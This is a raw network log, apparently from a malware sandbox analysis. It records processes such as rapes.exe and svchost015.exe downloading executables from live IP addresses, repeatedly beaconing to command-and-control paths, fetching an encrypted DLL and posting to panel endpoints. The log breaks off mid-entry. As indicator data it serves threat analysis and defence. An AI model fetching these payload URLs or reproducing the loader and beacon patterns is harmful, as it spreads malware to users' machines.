                    IN A
                    142.250.187.206
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.187.206
                  • flag-nl
                    GET
                    http://185.156.73.98/success?substr=mixthree&s=three&sub=none
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /success?substr=mixthree&s=three&sub=none HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:26 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-us
                    GET
                    http://107.174.192.179/app/u75a1_003.exe
                    rapes.exe
                    Remote address:
                    107.174.192.179:80
                    Request
                    GET /app/u75a1_003.exe HTTP/1.1
                    Host: 107.174.192.179
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.22.1
                    Date: Sat, 29 Mar 2025 14:00:27 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1313792
                    Last-Modified: Fri, 28 Mar 2025 06:53:45 GMT
                    Connection: keep-alive
                    ETag: "67e64779-140c00"
                    Accept-Ranges: bytes
                  • flag-nl
                    GET
                    http://185.156.73.98/success?substr=mixfour&s=three&sub=none
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /success?substr=mixfour&s=three&sub=none HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:27 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/info
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /info HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:33 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 21
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/update
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /update HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:33 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                    Content-Length: 99856
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:34 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=98
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:36 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=97
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:38 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=96
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:40 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=95
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:42 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=94
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:45 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=93
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:47 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=92
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:49 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=91
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:51 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=90
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:53 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=89
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:55 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=88
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-ru
                    GET
                    http://176.113.115.7/files/fate/random.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/fate/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:35 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Tue, 25 Mar 2025 18:10:04 GMT
                    ETag: "119c00-6312ea1425700"
                    Accept-Ranges: bytes
                    Content-Length: 1154048
                    Content-Type: application/x-msdos-program
                  • flag-nl
                    GET
                    http://185.156.73.98/info
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /info HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:37 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 21
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/update
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /update HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:37 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                    Content-Length: 99856
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:37 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=98
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:40 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=97
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:42 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=96
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:44 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=95
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:46 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=94
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:48 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=93
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:50 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=92
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:53 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=91
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:55 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=90
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/service
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /service HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:57 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=89
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN A
                    Response
                    play.google.com
                    IN A
                    172.217.169.46
                  • flag-gb
                    POST
                    https://play.google.com/log?hasfast=true&authuser=0&format=json
                    firefox.exe
                    Remote address:
                    172.217.169.46:443
                    Request
                    POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                    host: play.google.com
                    user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    referer: https://consent.youtube.com/
                    content-type: text/plain;charset=UTF-8
                    content-length: 739
                    origin: https://consent.youtube.com
                    sec-fetch-dest: empty
                    sec-fetch-mode: no-cors
                    sec-fetch-site: cross-site
                    te: trailers
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN A
                    Response
                    play.google.com
                    IN A
                    172.217.169.46
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN AAAA
                    Response
                    play.google.com
                    IN AAAA
                    2a00:1450:4009:818::200e
                  • 176.113.115.7:80
                    http://176.113.115.7/mine/random.exe
                    http
                    powershell.exe
                    36.3kB
                    1.9MB
                    763
                    1376

                    HTTP Request

                    GET http://176.113.115.7/mine/random.exe

                    HTTP Response

                    200
                  • 176.113.115.6:80
                    http://176.113.115.6/Ni9kiput/index.php
                    http
                    rapes.exe
                    6.2kB
                    7.8kB
                    48
                    31

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://176.113.115.6/Ni9kiput/index.php

                    HTTP Response

                    200
                  • 185.215.113.16:80
                    http://185.215.113.16/test/amnew.exe
                    http
                    rapes.exe
                    8.4kB
                    452.7kB
                    182
                    327

                    HTTP Request

                    GET http://185.215.113.16/test/amnew.exe

                    HTTP Response

                    200
                  • 185.215.113.209:80
                    http://185.215.113.209/Di0Her478/index.php
                    http
                    futors.exe
                    1.6kB
                    1.5kB
                    17
                    8

                    HTTP Request

                    POST http://185.215.113.209/Di0Her478/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.209/Di0Her478/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.209/Di0Her478/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.209/Di0Her478/index.php

                    HTTP Response

                    200
                  • 176.113.115.7:80
                    http://176.113.115.7/off/random.exe
                    http
                    rapes.exe
                    307.1kB
                    18.4MB
                    6645
                    13198

                    HTTP Request

